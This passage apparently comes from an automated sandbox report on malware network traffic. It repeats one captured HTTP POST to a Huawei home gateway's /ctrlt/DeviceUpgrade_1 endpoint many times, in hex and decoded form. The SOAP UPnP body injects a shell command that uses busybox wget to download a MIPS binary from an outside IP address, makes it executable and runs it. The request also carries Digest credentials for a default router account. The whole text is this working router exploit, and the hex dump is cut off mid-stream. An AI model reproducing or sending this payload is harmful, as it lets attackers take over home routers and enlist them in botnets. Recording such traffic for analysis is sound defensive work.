70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 